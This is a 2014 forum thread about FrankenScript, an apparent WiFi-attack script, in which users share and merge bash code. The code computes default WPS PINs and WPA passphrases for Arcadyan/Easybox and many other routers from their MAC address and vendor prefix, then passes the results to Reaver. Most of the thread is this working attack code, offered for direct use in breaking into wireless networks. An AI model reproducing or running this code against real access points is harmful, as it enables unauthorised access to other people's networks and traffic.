'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(i pressed enter)
Please choose an AP
(nothing but blank space)
Please input the number of your chosen target:'
Where is the choices of an AP suppose to appear?
The choices should appear just above "Please input the number of your chosen target".
Try what flyinghaggis suggested, if that doesn't work look in the FrankenScript temp folder and delete anything that might be in there.
Did wash display any access points?.
Did you select you WiFi device?.
Did you enable attack mode?.
Did you recieve any error messages?.
Last edited by slim76; 2014-01-17 at 22:56.
i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:ARCADYAN(){ # WPSPIN 1.5 - GPL v 3 by kcdtv # This function uses three amazing works # 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc # 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51 # 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com) # # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code # This function is based on the script easybox_keygen.sh previously mentioned # # The quotation from the original work start with double dash and are beetwen quotes # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA # the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged" # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX) # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to # give the full WPS PIN ($PIN) ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged K1=$((($c1)%16)) ######unchanged K2=$((($c2)%16)) ######unchanged X1=$((K1^${deci[3]})) ######unchanged X2=$((K1^${deci[2]})) ######unchanged X3=$((K1^${deci[1]})) ######unchanged Y1=$((K2^0x${hexi[1]})) ######unchanged Y2=$((K2^0x${hexi[2]})) ######unchanged Y3=$((K2^0x${hexi[3]})) ######unchanged Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged Z3=$((K1^K2)) ######unchanged STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass CHECKSUM }
I put you back CHECKSUM in case it helps you
Code:CHECKSUM(){ # The function checksum was written for bash by antares_145 form crack-wifi.com PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN) ACCUM=0 # to get a result using this function) ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc.... ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control " PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000 } # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if yiou have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please fee free to add any credits or such.
Code:#!/bin/bash # # # ##################################################################### AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt) AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt) ESSID=$(echo $AP_essid) BSSID=$(echo $AP_bssid) ##################################################################### FUNC_CHECKSUM(){ ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` DIGIT=`expr $ACCUM '%' 10` CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` PIN=`expr $PIN '+' $CHECKSUM` ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'` RESTE=`expr $ACCUM '%' 10` } CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':') FINBSSID=$(echo $BSSID | cut -d ':' -f4-) MAC=$(echo $FINBSSID | tr -d ':') CONVERTEDMAC=$(printf '%d\n' 0x$MAC) FINESSID=$(echo $ESSID | cut -d '-' -f2) PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':') CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':') MACESSID=$(echo $PAREMAC$FINESSID) STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PINWPS1=$(printf '%08d\n' $PIN) STRING2=`expr $STRING '+' 8` PIN=`expr 10 '*' $STRING2` FUNC_CHECKSUM PINWPS2=$(printf '%08d\n' $PIN) STRING3=`expr $STRING '+' 14` PIN=`expr 10 '*' $STRING3` FUNC_CHECKSUM PINWPS3=$(printf '%08d\n' $PIN) if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]]; then CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID) RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'` STRING4=`expr $RAIZ '+' 7` PIN=`expr 10 '*' $STRING4` FUNC_CHECKSUM PINWPS4=$(printf '%08d\n' $PIN) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 " PIN4REAVER=$PINWPS4 else case $CHECKBSSID in 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3" PIN4REAVER=$PINWPS1 ;; 001915) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 404A03) echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428" PIN4REAVER=11866428 ;; F43E61 | 001FA4) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 001A2B) if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760" PIN4REAVER=88478760 else echo -e "PIN POSSIBLE... > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; 3872C0) if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486" PIN4REAVER=18836486 else echo -e "PIN POSSIBLE > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; FCF528) echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761" PIN4REAVER= 20329761 ;; 3039F2) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; A4526F) echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 " PIN4REAVER=16538061 ;; 74888B) echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604" PIN4REAVER=43297917 ;; DC0B1A) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 " PIN4REAVER=$PINWPS1 ;; 002275) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 08863B) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 001CDF) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 00A026) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 5057F0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; C83A35 | 00B00C | 081075) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; E47CF9 | 801F02) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 0022F7) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; *) PIN4REAVER=$PINWPS1 ;; esac fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the 6 first digit of aracdyan the mac without the 2 pointsCode:;; XXXXXX | XXXXXX)
and then you generate string
than you generate the checksum to get the full PINCode:deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
Code:PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:;; XXXXXX | XXXXXX) deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
taht you have to place in your case esac sentence, anywhere untill it is before
Code:;; *)
Sorry mate I mean't would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know its kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL